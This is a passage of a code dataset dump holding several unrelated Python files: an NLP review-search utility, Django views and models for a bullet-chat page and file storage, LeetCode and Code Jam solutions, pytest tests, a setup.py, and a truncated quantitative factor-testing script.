nltk.download('averaged_perceptron_tagger')\n# nltk.download('wordnet')\nfrom nltk.tokenize import sent_tokenize\n\nembed = hub.load('use')\nmodel = keras.models.load_model('model') # From google colab. 40 epochs 2**16 batchsize\nproduct_embeddings = pd.read_pickle('data/product_embeds.pkl') # Run google colab GPU to get the embeddings of all unique products in the dataset\n# Import model for summarization\ntokenizer_reddit = AutoTokenizer.from_pretrained(\"google/pegasus-reddit_tifu\")\nmodel_reddit = AutoModelForSeq2SeqLM.from_pretrained(\"google/pegasus-reddit_tifu\")\n\nMAX_LEN = 150 # For the summary length\n\n\ndef euclidean_similarity(embed1, embed2):\n distance_matrix = euclidean_distances(embed1, embed2)\n similarity_matrix = 1 - distance_matrix / np.max(distance_matrix)\n return similarity_matrix\n\n\ndef get_sentiment_scores(review, sentiment='positive'):\n \"\"\"\n Returns sentiment scores for each sentence in one review and embeddings of review sentences\n\n args:\n review(str): review to have sentiment scores\n sentiment(str): default to 'positive'\n\n returns:\n sentiment_scores(np.array): sentiment score for each sentence. shape = (1, num_sentences)\n embeddings(tf.Tensor): Universal Sentence Encoder embedding. shape = (1, 512)\n \"\"\"\n\n review_sentences = sent_tokenize(review)\n embeddings = embed(tf.convert_to_tensor(review_sentences))\n sentiment_scores = 1\n if sentiment is not None:\n sentiment_scores = model.predict(embeddings)[:, 1].reshape(-1, 1) # 'positive'\n if sentiment == 'negative':\n sentiment_scores = 1 - sentiment_scores\n return sentiment_scores, embeddings\n\n\ndef similarity_scores(embeddings, query, keywords=True, euclidean=False):\n \"\"\"\n Returns a matrix of similarities between the sentences of a review(in embeddings) and the keywords or query sentences.\n\n args:\n embeddings(tf.Tensor): USE embeddings of a review sentences. shape = (1, 512)\n query(str): query that will be tokenized into bag-of-keywords or sentences\n keywords(bool): whether to use bag-of-words(keywords) in the query for computing the similarity score\n euclidean(bool): whether to use euclidean distance to compute similarity matrix\n\n returns:\n similarity_scores(np.array): similarity score matrix. shape = (num_sentences_in_a_review, num_keywords or num_query_sentences)\n \"\"\"\n\n if keywords:\n keywords = list(dict.fromkeys(\n [token.lemma_ for token in nlp(query.lower()) if token.pos_ in ['NOUN', 'PROPN', 'ADJ', 'VERB', 'X']]))\n keywords_len = len(keywords)\n embeddings_k = tf.concat([embed(keywords), embeddings], axis=0).numpy()\n similarity_matrix = euclidean_similarity(embeddings_k, embeddings_k) if euclidean else cosine_similarity(\n embeddings_k, embeddings_k)\n return similarity_matrix[keywords_len:, :keywords_len], keywords\n else:\n query_sentences = sent_tokenize(query)\n query_len = len(query_sentences)\n embeddings_q = tf.concat([embed(query_sentences), embeddings], axis=0).numpy()\n similarity_matrix = euclidean_similarity(embeddings_q, embeddings_q) if euclidean else cosine_similarity(\n embeddings_q, embeddings_q)\n return similarity_matrix[query_len:, :query_len], query_sentences\n\n\ndef sentimental_similarity_score_of_a_review(review, query, sentiment='positive', emphasized_keywords=None,\n euclidean=False):\n \"\"\"\n Returns a positive similarity score between a review and a query.\n\n args:\n review(str): review\n query(str): query\n sentiment(str): If not 'negative', it's considered as 'positive'. 'positive' is the default.\n emphasized_keywords(list): list of keywords to be emphasized (currently 1: 0.01)\n euclidean(bool): whether to use euclidean distance for similarity matrix.\n\n returns:\n similarity score(int): (positive) similarity score between a review and a query\n \"\"\"\n\n if review is None:\n return np.nan\n\n sentiment_scores, embeddings = get_sentiment_scores(review, sentiment)\n similarity_scores_keywords, keywords = similarity_scores(embeddings, query, euclidean=euclidean)\n similarity_scores_sentences, query_sentences = similarity_scores(embeddings, query, keywords=False,\n euclidean=euclidean)\n keywords_len, emphasized_keywords_len = len(keywords), len(emphasized_keywords)\n if emphasized_keywords and emphasized_keywords_len < keywords_len:\n emphasized_keywords = [token.lemma_ for token in nlp(' '.join(emphasized_keywords).lower()) if\n token.pos_ in ['NOUN', 'PROPN', 'ADJ', 'VERB', 'X']]\n regular_keywords_len = keywords_len - emphasized_keywords_len\n heavy_weight, light_weight = keywords_len * 0.9 / emphasized_keywords_len, keywords_len * 0.1 / regular_keywords_len\n weights_keywords = [heavy_weight if keyword in emphasized_keywords else light_weight for keyword in keywords]\n weights_sentences = [\n sum([heavy_weight if keyword in sentence else light_weight for keyword in emphasized_keywords]) for sentence\n in query_sentences]\n else:\n weights_keywords, weights_sentences = 1, 1\n\n keyword_scores = (similarity_scores_keywords * sentiment_scores * weights_keywords).max(axis=1)\n pos_sim_score_keywords = np.sqrt(keyword_scores.mean())\n\n query_sentence_scores = (similarity_scores_sentences * sentiment_scores * weights_sentences).max(axis=1)\n pos_sim_score_sentences = np.sqrt(query_sentence_scores.mean())\n\n return np.min([pos_sim_score_keywords, pos_sim_score_sentences])\n\n\ndef get_similarity_score_with_product(query, euclidean=False):\n \"\"\"\n Returns most similar product indices and its similarity scores with respect to the query\n\n args:\n query(str)\n euclidean(bool): whether to use euclidean distance for similarity matrix\n\n returns:\n product's indices of similarity and the similarity scores in descending order of similarity\n \"\"\"\n similarity_scores_keywords, keywords = similarity_scores(product_embeddings, query, euclidean=euclidean)\n similarity_scores_sentences, query_sentences = similarity_scores(product_embeddings, query, keywords=False,\n euclidean=euclidean)\n\n keyword_scores = similarity_scores_keywords.max(axis=1)\n query_sentence_scores = similarity_scores_sentences.max(axis=1)\n\n sim_scores = np.concatenate((keyword_scores.reshape(-1, 1), query_sentence_scores.reshape(-1, 1)), axis=1).min(\n axis=1)\n\n return np.argsort(sim_scores)[::-1], np.sort(sim_scores)[::-1]\n\ndef create_summary(text):\n \"\"\"\n Create summary of the input text using the NLP model\n \"\"\"\n tokenized_text = tokenizer_reddit.encode(text, return_tensors=\"pt\", truncation=True)\n summary_ids = model_reddit.generate(tokenized_text,\n num_beams=4,\n no_repeat_ngram_size=2,\n min_length=30,\n max_length=MAX_LEN,\n early_stopping=True)\n return \"...\"+tokenizer_reddit.decode(summary_ids[0], skip_special_tokens=True)+\"...\"","sub_path":"search_engine_app/app_utils.py","file_name":"app_utils.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"468588798","text":"# coding=utf8\n\"\"\"\n创建者:马子轩\n贡献者:\n创建时间: 2020年05月16日\n最后保存时间: 2020年05月16日\n\"\"\"\n\n\nfrom EO.models import BulletChat\nfrom django.shortcuts import HttpResponse, render, redirect\n\n\ndef index(request):\n \"\"\"直接返回页面\"\"\"\n bullet_group = BulletChat.objects.filter(verify=True)\n return render(request, \"App/520.html\", {\n 'bullet': bullet_group\n })\n\n\ndef stop(request):\n \"\"\"网站停止运营公告\"\"\"\n return render(request, \"App/520stop.html\")\n\n\ndef bullet(request):\n if request.method == \"POST\":\n name = request.POST['name']\n contain = request.POST['contain']\n if name and contain:\n BulletChat.objects.create(\n name=name,\n contain=contain,\n )\n return redirect('APPApi:520')\n","sub_path":"EO/AppApi/Light.py","file_name":"Light.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"174727042","text":"import sys\n\nouf = open('/Users/sigma/Documents/output.txt', 'w')\n\nn, k = 32, 500\n\nprint('Case #1:', file=ouf)\nfor i in range(1 << (n - 2)):\n good = True\n for a in range(2, 11):\n x = a ** (n - 1) + 1 + sum([a ** j for j in range(1, n - 1) if (i >> (j - 1)) & 1])\n if x % (a + 1) != 0:\n good = False\n break\n if good:\n print('1{}1 {}'.format(bin(i)[2:].zfill(n - 2), ' '.join([str(a + 1) for a in range(2, 11)])), file=ouf)\n k -= 1\n if k == 0:\n break","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_haku_main.py","file_name":"16_0_3_haku_main.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"257715762","text":"class Solution:\n def threeEqualParts(self, A: 'List[int]') -> 'List[int]':\n length=len(A)\n flag=0\n low=high=0\n for i in range(length):\n for j in range(i+2,length):\n a=self.value(A[:i+1])\n b=self.value(A[i+1:j])\n c=self.value(A[j:])\n if int(a)==int(b) and int(b)==int(c):\n flag=1\n low=i\n high=j\n if flag==1:\n return [low,high]\n else:\n return [-1,-1]\n def value(self,nums):\n length=len(nums)\n res=[]\n for i in range(length):\n res.append(str(nums[i]))\n return \"\".join(res)\nprint(Solution().threeEqualParts([1,1,0,1,1]))","sub_path":"201903/927.py","file_name":"927.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"528974557","text":"# 在二维平面上,给定两个顶边和底边与X轴平行的正方形。请找出能同时将这两个正方形分割成等面积两部分的一条直线。\r\n\r\n# 每个正方形的数据square包含3个数值,正方形的左下顶点坐标[X,Y] = [square[0],square[1]],以及正方形的边长square[2]。所求直线穿过两个正方形会形成4个交点,请返回4个交点形成线段的两端点坐标(两个端点即为4个交点中距离最远的2个点,这2个点所连成的线段一定会穿过另外2个交点)。2个端点坐标[X1,Y1]和[X2,Y2]的返回格式为{X1,Y1,X2,Y2},要求若X1 != X2,需保证X1 < X2,否则需保证Y1 <= Y2。\r\n\r\n# 若同时有多条直线满足要求,则选择斜率最大的一条计算并返回(与Y轴平行的直线视为斜率无穷大)。\r\n\r\n# 示例:\r\n\r\n# 输入:\r\n# square1 = {-1, -1, 2}\r\n# square2 = {0, -1, 2}\r\n# 输出: {-1,0,2,0}\r\n# 解释: 直线 y = 0 能将两个正方形同时分为等面积的两部分,返回的两线段端点为[-1,0]和[2,0]\r\n# 提示:\r\n\r\n# square.length == 3\r\n# square[2] > 0\r\n\r\n# 来源:力扣(LeetCode)\r\n# 链接:https://leetcode-cn.com/problems/bisect-squares-lcci\r\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\r\n\r\n# 在二维平面上,给定两个顶边和底边与X轴平行的正方形。请找出能同时将这两个正方形分割成等面积两部分的一条直线。\r\n\r\n# 每个正方形的数据square包含3个数值,正方形的左下顶点坐标[X,Y] = [square[0],square[1]],以及正方形的边长square[2]。所求直线穿过两个正方形会形成4个交点,请返回4个交点形成线段的两端点坐标(两个端点即为4个交点中距离最远的2个点,这2个点所连成的线段一定会穿过另外2个交点)。2个端点坐标[X1,Y1]和[X2,Y2]的返回格式为{X1,Y1,X2,Y2},要求若X1 != X2,需保证X1 < X2,否则需保证Y1 <= Y2。\r\n\r\n# 若同时有多条直线满足要求,则选择斜率最大的一条计算并返回(与Y轴平行的直线视为斜率无穷大)。\r\n\r\n# 示例:\r\n\r\n# 输入:\r\n# square1 = {-1, -1, 2}\r\n# square2 = {0, -1, 2}\r\n# 输出: {-1,0,2,0}\r\n# 解释: 直线 y = 0 能将两个正方形同时分为等面积的两部分,返回的两线段端点为[-1,0]和[2,0]\r\n# 提示:\r\n\r\n# square.length == 3\r\n# square[2] > 0\r\n\r\n# 来源:力扣(LeetCode)\r\n# 链接:https://leetcode-cn.com/problems/bisect-squares-lcci\r\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\r\n\r\ntry:\r\n MOD = 10**9 + 7\r\n from collections import defaultdict\r\n from typing import *\r\n import os, sys, random, math, threading\r\n curFileParentPath = os.path.dirname(\r\n os.path.dirname(os.path.realpath(__file__)))\r\n sys.path.append(curFileParentPath)\r\n from Utils.Tree import *\r\n from Utils.ListNode import *\r\n from Utils.Executor import Execute\r\nexcept Exception as err:\r\n print('Import failed: ' + str(err))\r\n\r\n\r\nclass Solution:\r\n def cutSquares(self, square1: List[int],\r\n square2: List[int]) -> List[float]:\r\n # 两个正方形的中心形成的直线即为所求\r\n # 注意中心重合的情况, 此时直线平行于y轴\r\n x1, y1, e1 = square1\r\n x2, y2, e2 = square2\r\n c1 = (x1 + e1 / 2, y1 + e1 / 2)\r\n c2 = (x2 + e2 / 2, y2 + e2 / 2)\r\n if c1 == c2:\r\n # 中心为同一点, 直线要平行于y轴\r\n newx = x1 + e1 / 2\r\n mny = min(y1, y2)\r\n mxy = max(y1 + e1, y2 + e2)\r\n return [newx, mny, newx, mxy]\r\n else:\r\n # 求交点直线与正方形最外边的4个平行和垂直x轴的直线的交点\r\n # 若其在线段内, 则将其加入res中\r\n # 最后求距离最大的两个交点, 即为结果\r\n mnX, mxX = min(x1, x2), max(x1 + e1, x2 + e2)\r\n mnY, mxY = min(y1, y2), max(y1 + e1, y2 + e2)\r\n cx1, cy1 = c1\r\n cx2, cy2 = c2\r\n if cx1 == cx2:\r\n return [cx1, mnY, cx1, mxY]\r\n if cy1 == cy2:\r\n return [mnX, cy1, mxX, cy1]\r\n k = (cy1 - cy2) / (cx1 - cx2)\r\n b = cy1 - k * cx1\r\n\r\n def inLines(x, y):\r\n return (x1 <= x <= x1 + e1\r\n or x2 <= x <= x2 + e2) and (y1 <= y <= y1 + e1\r\n or y2 <= y <= y2 + e2)\r\n\r\n p = []\r\n for x in (mnX, mxX):\r\n y = k * x + b\r\n if inLines(x, y):\r\n p.append((x, y))\r\n for y in (mnY, mxX):\r\n x = (y - b) / k\r\n if inLines(x, y):\r\n p.append((x, y))\r\n\r\n mxdist = 0\r\n res = []\r\n for i in range(len(p)):\r\n for j in range(i + 1, len(p)):\r\n x1, y1 = p[i]\r\n x2, y2 = p[j]\r\n dist = (x2 - x1)**2 + (y2 - y1)**2\r\n if dist > mxdist:\r\n mxdist = dist\r\n if x1 < x2 or x1 == x2 and y1 < y2:\r\n res = [x1, y1, x2, y2]\r\n else:\r\n res = [x2, y2, x1, y1]\r\n return res\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n print(Solution().cutSquares([68, 130, 64],\r\n [-230, 194, 7])) # or Execute()\r\n except Exception as err:\r\n print(err)\r\n","sub_path":"Medium/面试题 16.13. 平分正方形.py","file_name":"面试题 16.13. 平分正方形.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"616545534","text":"import pytest\nimport json\nfrom aionetworking.actions.echo import InvalidRequestError\nfrom aionetworking.utils import aone\n\n\nclass TestEcho:\n\n @pytest.mark.asyncio\n async def test_00_do_one(self, echo_action, echo_request_object, echo_response):\n response = await echo_action.do_one(echo_request_object)\n assert response == echo_response\n\n @pytest.mark.asyncio\n async def test_01_do_notification(self, echo_action, echo_notification_request_object, echo_notification, client_sock_str):\n response = await echo_action.do_one(echo_notification_request_object)\n assert response is None\n notification = await aone(echo_action.get_notifications(client_sock_str))\n assert notification == echo_notification\n\n @pytest.mark.asyncio\n async def test_02_on_exception(self, echo_action, echo_exception_request_object, echo_exception_response):\n with pytest.raises(InvalidRequestError):\n await echo_action.do_one(echo_exception_request_object)\n try:\n await echo_action.do_one(echo_exception_request_object)\n except InvalidRequestError as e:\n response = echo_action.on_exception(echo_exception_request_object, e)\n assert response == echo_exception_response\n\n @pytest.mark.asyncio\n async def test_03_on_decode_error(self, echo_action, echo_request_invalid_json, echo_decode_error_response):\n with pytest.raises(json.decoder.JSONDecodeError):\n json.loads(echo_request_invalid_json)\n try:\n json.loads(echo_request_invalid_json)\n except json.decoder.JSONDecodeError as e:\n response = echo_action.on_decode_error(echo_request_invalid_json, e)\n assert response == echo_decode_error_response\n","sub_path":"tests/test_actions/test_echo.py","file_name":"test_echo.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"499186381","text":"\"\"\"\nModule responsible for sending emails.\n\"\"\"\n\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\n\n\ndef send_email(subject, message, recepient_list, template, email_data):\n template = 'emails/' + template\n html_message=render_to_string(template, email_data)\n send_mail(subject,\n message,\n settings.DEFAULT_FROM_EMAIL,\n recepient_list,\n html_message=html_message\n )\n","sub_path":"vacomsBlog/utils/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"379529190","text":"import os\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom personnel.models import Department,Staff\n\n\n# Create your models here.\n\n\n\ndef get_media_abspath():\n \"\"\"\n 所有文件都直接放到 media/file 目录下,不再做不必要的划分,增加麻烦!\n \"\"\"\n media_root = settings.MEDIA_ROOT\n file_path = os.path.join(media_root,\"file\")\n return file_path\n\n#\n# class Directory(models.Model):\n# \"\"\"\n# name: 用户能看到的文件目录名. todo: 同级目录下不允许重复\n# parent: 上级目录,如果本身是根目录则 parent 为空字符\n# path: 用户能看到的相对路径,需要用 get_full_path 才能转换成绝对路径\n# \"\"\"\n# nid = models.AutoField(primary_key=True)\n# name = models.CharField(max_length=256) # 如 / home\n# owner = models.ForeignKey(Staff, to_field='sid', on_delete=models.CASCADE,db_constraint=False,verbose_name=\"上传者\")\n# parent = models.ForeignKey('Directory', null=True, on_delete=models.CASCADE) # 只有根目录没有 parent\n# path = models.CharField(max_length=4096, default='')\n# depart = models.ForeignKey(Department, to_field='id', null=True, on_delete=models.CASCADE,verbose_name=\"所属部门\") # 跟部门关联\n#\n#\n# def __str__(self):\n# return self.name or '/'\n#\n# class Meta:\n#\n# db_table = \"file_directory\"\n# verbose_name = \"文件目录\"\n# verbose_name_plural = \"文件目录\"\n#\n#\n# @classmethod\n# def create_root_dir(cls, user):\n# \"\"\"\n# 用户注册时,会同时创建一个根目录对象\n# \"\"\"\n# directory = cls.objects.create(\n# name= '/',\n# owner=user,\n# parent=None,\n# path='' # 根目录为空字符,方便后续 URL 拼接不出现 // 影响美观\n# )\n# return directory\n#\n# def get_url(self):\n# return '/{}/{}'.format(self.owner.username, self.path)\n#\n# def rmdir(self):\n# \"\"\"\n# 删除子目录和子目录下的文件,以及自身包含的文件和自身\n# \"\"\"\n# for subdir in Directory.objects.filter(parent=self):\n# for file in subdir.file_set.all():\n# Link.minus_one(file)\n#\n# for file in self.file_set.all():\n# Link.minus_one(file)\n#\n# self.delete()\n\n\nclass File(models.Model):\n \"\"\"\n name: 用户能看到的文件目录名.\n 考虑到文件名只是存在于数据库的字段,所以不需要限制命名规则\n digest: 文件的 sha1 摘要,也是文件真正的名字\n owner: 文件所有者\n size: 文件大小\n parent: 上级目录\n path: 相对路径,包含了 digest 作为文件名,和用户自定义的树形结构对应\n 但是服务器的储存不按照这个结构存放\n 如果对应的话,那么多个File对象映射同一个文件时,下载路径按照 path 来会出错\n 此外,path 需要包含用户的根目录,如 user_12,否则用户无法引用到其他用户的文件\n 文件的 path 不应该包括文件名,否则会造成改 name 时 path 不能一起改\n \"\"\"\n classify_choice = ((1, \"文件\"), (2, \"图片\"))\n\n nid = models.AutoField(primary_key=True)\n name = models.CharField(max_length=256)\n owner = models.ForeignKey(Staff, to_field='sid', on_delete=models.CASCADE,db_constraint=False,verbose_name=\"上传者\")\n classify = models.IntegerField(choices=classify_choice, default=1, verbose_name=\"文件类型\")\n size = models.IntegerField(default=0)\n # parent = models.ForeignKey(Directory, on_delete=models.CASCADE)\n digest = models.CharField(max_length=40)\n path = models.CharField(max_length=4096, default='')\n create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')\n last_edit = models.DateTimeField(auto_now=True, verbose_name='最后编辑时间')\n\n class Meta:\n\n db_table = \"file\"\n verbose_name = \"文件信息\"\n verbose_name_plural = \"文件信息\"\n\n def __str__(self):\n return self.name\n\n def get_full_path(self):\n \"\"\" 文件的服务器路径 \"\"\"\n return os.path.join(get_media_abspath(), self.digest)\n\n def remove_from_disk(self):\n \"\"\"\n 删除磁盘上的文件,而不是只减少计数器+删除 File 对象\n 用于发现重复文件后,清除新添加的文件,保留用户的 File 对象,改写其 path 值\n \"\"\"\n os.remove(self.get_full_path())\n\n def get_url(self):\n \"\"\"\n 没有这步判断,根目录下的文件链接会多一条杠。\n \"\"\"\n if self.path:\n return '/{}/{}/{}'.format(self.owner.name, self.path, self.name)\n else:\n return '/{}/{}'.format(self.owner.name, self.name)\n\n def get_size(self): # Byte\n \"\"\"\n make the file size more human-readable\n \"\"\"\n size = self.size\n if size > 1024**3: # GB\n size = '{:.2f} GB'.format(size/(1024**3))\n elif size > 1024**2: # MG\n size = '{:.2f} MB'.format(size/(1024**2))\n elif size > 1024:\n size = '{:.2f} KB'.format(size/(1024))\n else:\n size = '{:.2f} Bytes'.format(size)\n return size\n\n\nclass FileTag(models.Model):\n nid = models.AutoField(primary_key=True)\n name = models.CharField(max_length=128)\n file = models.ManyToManyField(\n File,\n through='Membership',\n through_fields=('tag', 'file'),\n )\n\n class Meta:\n\n db_table = \"file_tag\"\n verbose_name = \"文件标签\"\n verbose_name_plural = \"文件标签\"\n\n\nclass Membership(models.Model):\n nid = models.AutoField(primary_key=True)\n tag = models.ForeignKey(FileTag, on_delete=models.CASCADE)\n file = models.ForeignKey(File, on_delete=models.CASCADE)\n\n class Meta:\n\n db_table = \"file2tag\"\n verbose_name = \"文件|标签关系表\"\n verbose_name_plural = \"文件|标签关系表\"\n\n\n# class Link(models.Model):\n# \"\"\"\n# 记录文件的摘要和links数\n# 当用户删除文件时,删掉文件对象,但是不从磁盘删除,\n# 除非对应的 link 数为0,表示该 hash 值对应的所有文件已经删光,\n# 此时,从磁盘删除文件\n#\n# 每次上传文件必然产生两种情况:\n# 1. 产生一个新的 link 对象\n# 2. links 值 + 1\n#\n# 之前把 links 属性放在 File,有一个问题,当记录 links 的文件被删除时,\n# 这个值就丢失了\n# \"\"\"\n# nid = models.AutoField(primary_key=True)\n# digest = models.CharField(max_length=40, primary_key=True) # 和 digest 绑定,而不是和文件绑定\n# links = models.IntegerField() # links 数\n#\n# class Meta:\n#\n# db_table = \"file_link\"\n# verbose_name = \"文件引用计数\"\n# verbose_name_plural = \"文件引用计数\"\n#\n# def __str__(self):\n# return str(self.links)\n#\n# @classmethod\n# def add_one(cls, file):\n# \"\"\"\n# 新增文件后调用。使得计数器加一\n# 如果对应的 digest 没有计数器,则创建计数器,并 links = 1\n# \"\"\"\n# nums = File.objects.filter(digest=file.digest).count()\n# link_objects = cls.objects.filter(digest=file.digest)\n# if link_objects:\n# link = link_objects[0]\n# link.links = nums\n# link.save()\n# else:\n# link = cls.objects.create(digest=file.digest, links=nums) # nums 为1\n#\n# @classmethod\n# def minus_one(cls, file):\n# \"\"\"\n# 删除文件后调用。使得计数器减一\n# 如果对应的 digest 的计数器为 0,那么从磁盘删除掉这个文件\n# \"\"\"\n# link = cls.objects.get(digest=file.digest)\n# link.links -= 1\n#\n# if link.links < 1:\n# file.remove_from_disk()\n# link.delete()\n# else:\n# link.save()\n#\n# file.delete()","sub_path":"apps/file/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"281214525","text":"#! /usr/bin/env python\nimport logging\nfrom setuptools import setup, find_packages, Command\n\n\nclass DownloadJSONFiles(Command):\n\n description = 'Download all addresses data from Google i18n API'\n user_options = []\n logger = None\n\n def initialize_options(self):\n logging.basicConfig()\n self.logger = logging.getLogger('i18naddress.downloader')\n self.logger.setLevel(logging.DEBUG)\n\n def finalize_options(self):\n pass\n\n def run(self):\n from i18naddress.downloader import download\n download()\n\nsetup(\n name='google-i18n-address',\n author='Mirumee Software',\n author_email='hello@mirumee.com',\n description='Address validation helpers for Google\\'s i18n address database', # noqa\n license='BSD',\n version='1.0.3',\n url='https://github.com/mirumee/google-i18n-address',\n packages=find_packages(),\n include_package_data=True,\n install_requires=[\n 'requests>=2.7.0',\n ],\n cmdclass={'update_validation_files': DownloadJSONFiles},\n zip_safe=False\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253341039","text":"# coding:utf-8 \n\"\"\"\nauthor:Sam\ndate:2021/2/1\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io\nfrom scipy import stats\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nfrom collections import Counter\n\n# 计时开始\n# time_start = time.time()\n\n\n# 第一步:数据读取/输入\n# 1.1 mat文件数据读取(已有因子值)\nDayPrice_stock = scipy.io.loadmat('D:\\\\pycharm project\\\\factor_testing\\\\DayPrice_Stock.mat') # 输入因子值文件\nfactor1 = scipy.io.loadmat('D:\\\\pycharm project\\\\factor_testing\\\\MV.mat') # 输入因子值文件\nindustry = scipy.io.loadmat('D:\\\\pycharm project\\\\factor_testing\\\\CSLv1.mat')\n\n# 1.2 CSV文件数据读取(已有因子值)\n# DayPrice_stock = pd.read_csv('DayPrice_Stock.csv')\n# factor = pd.read_csv('D:\\\\pycharm project\\\\factor_testing\\\\factor.csv') # 输入因子值文件\n# industry = pd.read_csv('CSLv1.csv')\n\n# 1.3 因子值计算(未有因子值,需要通过计算得到)\n# 归母净利润TTM(季频转日频)\nfactor2=scipy.io.loadmat('NPParentCompanyOwners.mat')\ntime=factor2['Report_dates_num'].reshape(1,-1)[0]\ntime=pd.to_datetime(time-719529, unit='D')\nstockName=[]\nfor i in factor2['RICs'].reshape(1,-1)[0]:\n stockName.append(i[0])\nprofit=pd.DataFrame(factor2['NPParentCompanyOwners_TTM'],index=time,columns=stockName)\n\n# 将季度报日期转为证监会规定的财报披露的最后一天。输入季频数据,输出季频数据\ndef statementDatesDeal(data):\n dates=data.index\n datesNew=[]\n #由于年报与一季度报的披露最晚日期都是4/30,我们删除较旧的12/31的数据\n for date in dates[:-1]:\n d=str(date)[:10]\n if d[5:]==\"03-31\":\n datesNew.append(d[:5]+\"4-30\")\n if d[5:]==\"06-30\":\n datesNew.append(d[:5]+\"8-30\")\n if d[5:]==\"09-30\":\n datesNew.append(d[:5]+\"10-31\")\n if d[5:]==\"12-31\":\n data=data.drop(date,axis=0)\n #最后一天如果是12/31,则不用删,用其作为第二年\n for date in [dates[-1]]:\n d=str(date)[:10]\n if d[5:]==\"03-31\":\n datesNew.append(d[:5]+\"4-30\")\n if d[5:]==\"06-30\":\n datesNew.append(d[:5]+\"8-30\")\n if d[5:]==\"09-30\":\n datesNew.append(d[:5]+\"10-31\")\n if d[5:]==\"12-31\":\n datesNew.append(str(int(d[:4])+1)+\"-\"+\"4-30\")\n data.index=pd.to_datetime(datesNew)\n return data\n\n#季度频率变日频\ndef to_daily_freq(quarter,trade_date):\n dates_q = pd.to_datetime(quarter.index)\n dates_d = pd.to_datetime(trade_date)\n df = pd.DataFrame(None,index=dates_d,columns=quarter.columns)\n count = 0\n for i in df.index:\n if (i>= dates_q[count]) & (i< dates_q[count+1]):\n df.loc[i] = quarter.iloc[count]\n else:\n count = count+1\n df.loc[i] = quarter.iloc[count]\n return df\n\n\n\n\n# 第二步:数据预处理\n# 2.1 mat格式数据处理\n# 将array序列转为list\ndef array_to_list(factor,column):\n list=[]\n for x in factor[column].reshape(1,-1)[0]:\n x[0] = str(x[0]) # 这里再研究一下\n list.append(x[0])\n return list\n\n# 将array序列转为datetime\ndef array_to_datetime(factor,column):\n x = pd.to_datetime(pd.Series(factor[column].flatten()).apply(lambda x:str(x[0])))\n return x\n\n# 将date_num转化为list\ndef datenum_to_list(factor):\n date_num = []\n for x in factor['date_num']:\n date_num.append(x[0])\n return date_num\n\n\n# 2.2 统一日期 日期对齐\n\"\"\" datetime number\nDayPrice_stock: 731220-737859 日度数据(4409)\nfactor: \nindustry: 731583-737860 日度数据(4173)\n\"\"\"\n# date_num 和 date 对应关系\na = array_to_datetime(DayPrice_stock,'date')\nb = datenum_to_list(DayPrice_stock)\ndate = pd.DataFrame(a.values,index = b,columns=['date'])\n# print(date)\n\n# 取三个表的日期交集\n# start_date_num = max(b[0],datenum_to_list(factor1)[0],datenum_to_list(industry)[0])\nstart_date_num = 734142\nend_date_num = min(b[-1],datenum_to_list(factor1)[-1],datenum_to_list(industry)[-1])\ndate = date.loc[start_date_num:end_date_num]\n# print(date)\n\n\n# 2.3\n# 获取股票池收盘价数据\ndef stock(DayPrice_stock):\n stockName = []\n for i in DayPrice_stock['RICs'].reshape(1, -1)[0]:\n stockName.append(i[0])\n price = DayPrice_stock['ClosePrice']\n time = array_to_datetime(DayPrice_stock,'date')\n price = pd.DataFrame(price, columns=stockName, index=time)\n return price\n\n\n# 2.4 临时处理函数\n# series删除0\ndef drop_zero(series):\n dict = {}\n for x,y in series.items():\n if y == 0:\n continue\n else:\n dict['x'] = y\n new_series = pd.Series(dict)\n return new_series\n\n\n# 第三步:\n# 3.1 异常值处理:MAD中位数去极值法\ndef filter_extreme_MAD(series,n=3*1.4826):\n median = series.median()\n new_median = ((series - median).abs()).median()\n max_range = median + n*new_median\n min_range = median - n*new_median\n return np.clip(series,min_range,max_range)\n\n# 3.2 行业中性化\n# 获取当日行业标签\ndef get_industry_exposure(stock_list,industry,date):\n df = pd.DataFrame(index=range(1001,1030), columns=stock_list)\n for stock in stock_list:\n label = industry.loc[date][stock]\n try:\n df.loc[label][stock] = 1\n except:\n continue\n return df.fillna(0) # 将NaN赋为0\n\n# 行业中性\n# def neutralization(series,industry_label):\n# date = series.name\n# date = date.strftime('%Y-%m-%d')\n# index = series.dropna().index\n# y = series.dropna()\n# # 这里开始有问题\n# dummy_var = pd.get_dummies(industry_label.loc[date]).drop([0], axis=1)\n# # dummy_var = get_industry_exposure(industry_label.columns, industry_label, date).T\n# x = dummy_var.loc[index]\n# result = sm.OLS(y.astype(float), x.astype(float)).fit()\n# residue = result.resid\n# return residue\n\n# 中性化(行业中性+市值中性)\ndef neutralization(series,industry_label,market_value):\n date = series.name\n date = 